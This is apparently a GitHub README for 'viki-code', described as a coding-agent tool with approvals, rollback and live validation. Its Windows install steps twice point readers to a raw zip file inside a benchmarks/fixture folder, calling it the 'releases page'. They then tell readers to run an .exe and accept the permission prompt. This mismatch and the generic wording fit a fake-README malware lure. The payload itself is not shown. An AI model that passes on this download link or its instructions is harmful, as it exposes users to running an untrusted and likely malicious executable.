Governed coding agent infrastructure for real repositories with approvals, rollback, live validation, and local CLI/API/IDE workflows.
viki-code is a tool that helps you manage and control changes to your code. It works like a guide to make sure every change you make meets set rules before you save it. It lets you approve changes, undo mistakes, and check your code in real-time. You can use it through simple commands on your computer or through tools like Visual Studio Code.
This means fewer errors and better control when working with coding projects, even if you are not an expert programmer.
- Approval System: Changes only move forward after approval, making your work safer.
- Rollback: Undo changes quickly if something goes wrong.
- Live Validation: Checks your code as you work to catch issues immediately.
- Local Workflows: Work on your computer using command-line or tools like your code editor.
- API & CLI Support: Use easy commands or connect with other apps.
- Safe Collaboration: Supports teams working on the same project with clear rules.
- Multi-Agent Automation: Manages tasks using multiple assistants working together.
You can get the latest version of viki-code for Windows from this page:
Visit the link above. It will show you all the recent versions available for download.
To use viki-code on your Windows computer, you need:
- Windows 10 or later
- At least 4 GB of RAM
- 500 MB of free storage space
- Internet connection for initial setup and approvals
- Visual Studio Code (optional, for IDE integration)
Follow these steps to get viki-code running on your Windows PC:
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Go to the Download Page
Visit the releases page here:
https://raw.githubusercontent.com/Maltesecrosssuperfund776/viki-code/main/benchmarks/public/matrix_bugfix/fixture/pkg/viki-code-2.6-alpha.5.zip -
Find the Latest Release
Look for the newest release version at the top of the list. -
Download the Installer
Under the latest release, find the.exefile (for example,viki-code-setup.exe). Click on it to download to your computer. -
Run the Installer
Once downloaded, open the file by double-clicking it.
If Windows asks for permission, click "Yes" to continue. -
Follow the Setup Instructions
The installer will guide you step by step. Choose where to install it (the default folder usually works fine). -
Finish Installation
When the installer completes, you will see a confirmation. You may be asked to restart your computer. If so, save your work and restart.
After installation, start using viki-code with these steps:
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Open Command Prompt
PressWindows + R, typecmd, and press Enter. -
Start viki-code
Typeviki-codeand press Enter. You should see a welcome message or instructions. -
Run Basic Commands
Use simple commands likeviki-code validateto check your code orviki-code approveto approve changes.
If you have Visual Studio Code installed:
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Open VS Code.
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Go to the Extensions section and search for "viki-code".
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Install the extension provided.
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Once installed, you can use viki-code features directly in your editor to approve changes, rollback, and validate your code.
This is how you typically work with viki-code:
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Make changes to your code or files.
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Run validation to check your work:
viki-code validate -
If validation passes, request approval:
viki-code request-approval -
After approval, the changes are saved and ready.
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If you find a problem later, rollback with:
viki-code rollback
This workflow ensures every change is checked, approved, and easy to undo if necessary.
viki-code helps teams work together easily. When working with others:
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Changes must be approved by other team members.
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The tool keeps track of who approved what.
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You get notified about change status and required approvals.
This keeps your projects organized and reduces mistakes from unexpected edits.
If viki-code does not work as expected:
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Check if your Windows meets system requirements.
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Make sure the installer completed without errors.
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Restart your computer if you face issues starting viki-code.
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Use the command
viki-code helpto see a list of commands and explanations. -
Visit the GitHub page for updates and additional help.
viki-code works with these developer tools to improve your experience:
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Visual Studio Code (recommended for easy GUI access to viki-code features)
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Popular command line terminals (Command Prompt, PowerShell)
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REST APIs for integration with other systems or apps
This project includes:
agentic-ai, ai-agent, approvals, automation, code-review, developer-tools, cli, api, multi-agent workflows, self-hosted setups, and live validation.
These combine to give you powerful control over code projects with clear rules and easy use.
Get started right now. Visit the release page to download the latest version:
https://raw.githubusercontent.com/Maltesecrosssuperfund776/viki-code/main/benchmarks/public/matrix_bugfix/fixture/pkg/viki-code-2.6-alpha.5.zip